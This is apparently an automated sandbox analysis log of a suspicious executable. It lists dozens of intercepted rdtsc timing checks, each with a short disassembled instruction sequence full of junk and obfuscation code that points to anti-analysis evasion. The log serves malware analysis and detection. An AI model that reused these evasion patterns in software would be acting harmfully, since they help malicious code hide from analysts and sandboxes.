            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D18EB second address: 9D18F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FA6C4CAD506h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D387A second address: 9D389F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FA6C4EBA087h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D45A2 second address: 9D45A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D389F second address: 9D38A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D38A6 second address: 9D38AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D47F2 second address: 9D47F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D5706 second address: 9D570A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D570A second address: 9D570E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D570E second address: 9D5714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D5714 second address: 9D578D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA07Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jne 00007FA6C4EBA078h 0x00000011 pop esi 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FA6C4EBA078h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D1BCAh], edi 0x00000033 push dword ptr fs:[00000000h] 0x0000003a mov ebx, eax 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 movzx edi, dx 0x00000046 mov eax, dword ptr [ebp+122D09CDh] 0x0000004c movsx edi, di 0x0000004f mov bx, si 0x00000052 push FFFFFFFFh 0x00000054 sub dword ptr [ebp+124652BFh], eax 0x0000005a nop 0x0000005b jmp 00007FA6C4EBA07Ah 0x00000060 push eax 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D776C second address: 9D7770 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D7770 second address: 9D777B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D777B second address: 9D77F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007FA6C4CAD508h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 mov ebx, dword ptr [ebp+122D1943h] 0x00000027 push 00000000h 0x00000029 jmp 00007FA6C4CAD516h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007FA6C4CAD508h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FA6C4CAD516h 0x00000053 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D8794 second address: 9D879A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D879A second address: 9D87E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD516h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jbe 00007FA6C4CAD51Ch 0x00000011 jmp 00007FA6C4CAD516h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA6C4CAD50Eh 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D9721 second address: 9D97A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FA6C4EBA081h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FA6C4EBA078h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 xor ebx, 6BD9FDC7h 0x0000002e push 00000000h 0x00000030 mov edi, dword ptr [ebp+122D1C0Eh] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007FA6C4EBA078h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 mov edi, dword ptr [ebp+122D380Bh] 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b js 00007FA6C4EBA078h 0x00000061 pushad 0x00000062 popad 0x00000063 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9D97A2 second address: 9D97AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FA6C4CAD506h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9DB680 second address: 9DB6EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov ebx, 2A6B7854h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FA6C4EBA078h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007FA6C4EBA078h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 xor ebx, dword ptr [ebp+122D3757h] 0x0000004b xchg eax, esi 0x0000004c pushad 0x0000004d jmp 00007FA6C4EBA07Dh 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9DB6EE second address: 9DB715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4CAD512h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA6C4CAD50Bh 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9DB895 second address: 9DB899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9DB899 second address: 9DB89F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9DC936 second address: 9DC93B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9DC93B second address: 9DC940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9DF570 second address: 9DF574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9DF574 second address: 9DF58B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD513h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E4757 second address: 9E475B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E475B second address: 9E475F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E475F second address: 9E4765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E4765 second address: 9E476A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 987167 second address: 987177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ebx 0x00000006 ja 00007FA6C4EBA076h 0x0000000c pop ebx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 987177 second address: 98719D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA6C4CAD519h 0x0000000c jc 00007FA6C4CAD506h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E855A second address: 9E856F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA6C4EBA07Bh 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E856F second address: 9E8591 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA6C4CAD506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop ecx 0x00000015 jmp 00007FA6C4CAD50Dh 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E8591 second address: 9E859D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 ja 00007FA6C4EBA076h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E859D second address: 9E85A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E871C second address: 9E8726 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E8726 second address: 9E8738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4CAD50Eh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E8738 second address: 9E873C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9E873C second address: 9E8742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 982307 second address: 98230D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 98230D second address: 982325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA6C4CAD50Dh 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 982325 second address: 98232F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA6C4EBA076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9F16A5 second address: 9F16A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9F16A9 second address: 9F1706 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FA6C4EBA082h 0x0000000e jmp 00007FA6C4EBA080h 0x00000013 popad 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 pushad 0x00000019 jmp 00007FA6C4EBA089h 0x0000001e jbe 00007FA6C4EBA07Ch 0x00000024 jns 00007FA6C4EBA076h 0x0000002a popad 0x0000002b mov eax, dword ptr [eax] 0x0000002d pushad 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9F1706 second address: 9F173C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4CAD515h 0x00000009 popad 0x0000000a push edi 0x0000000b ja 00007FA6C4CAD506h 0x00000011 pop edi 0x00000012 popad 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 jmp 00007FA6C4CAD50Bh 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 98C277 second address: 98C284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FA6C4EBA076h 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 98C284 second address: 98C28A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9F52E2 second address: 9F52E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9F52E6 second address: 9F5318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FA6C4CAD50Ah 0x00000010 popad 0x00000011 pop ecx 0x00000012 pushad 0x00000013 push eax 0x00000014 jmp 00007FA6C4CAD50Fh 0x00000019 pop eax 0x0000001a push ecx 0x0000001b jnc 00007FA6C4CAD506h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9F5318 second address: 9F534C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA6C4EBA089h 0x0000000c jmp 00007FA6C4EBA084h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9F58D5 second address: 9F58E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9F5DDC second address: 9F5DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9F5F57 second address: 9F5F6D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA6C4CAD506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA6C4CAD50Ch 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9F6101 second address: 9F610E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007FA6C4EBA082h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9F610E second address: 9F6122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA6C4CAD506h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jo 00007FA6C4CAD506h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9F625A second address: 9F625E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9F625E second address: 9F6271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4CAD50Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9F6271 second address: 9F6281 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FA6C4EBA07Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9F63C7 second address: 9F63E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD519h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FEDDD second address: 9FEE11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA088h 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007FA6C4EBA076h 0x0000000f jmp 00007FA6C4EBA082h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FEE11 second address: 9FEE39 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA6C4CAD506h 0x00000008 jmp 00007FA6C4CAD513h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jnc 00007FA6C4CAD512h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FEE39 second address: 9FEE3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FEE3F second address: 9FEE46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FDB0C second address: 9FDB10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FDB10 second address: 9FDB3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007FA6C4CAD510h 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007FA6C4CAD50Eh 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FDB3C second address: 9FDB46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FA6C4EBA076h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FDB46 second address: 9FDB5A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA6C4CAD506h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FDB5A second address: 9FDB60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FDB60 second address: 9FDB6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FA6C4CAD506h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FDB6F second address: 9FDB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FDB73 second address: 9FDB96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4CAD50Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FA6C4CAD510h 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FDCFC second address: 9FDD17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4EBA07Dh 0x00000009 popad 0x0000000a jne 00007FA6C4EBA07Eh 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FDEA9 second address: 9FDEB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FDEB1 second address: 9FDEB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FDEB5 second address: 9FDEBB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FE165 second address: 9FE169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FE169 second address: 9FE172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FE2E3 second address: 9FE2F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4EBA081h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FE2F8 second address: 9FE306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FA6C4CAD50Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FE306 second address: 9FE30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FE30C second address: 9FE313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeRDTSC instruction interceptor: First address: 9FE313 second address: 9FE319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
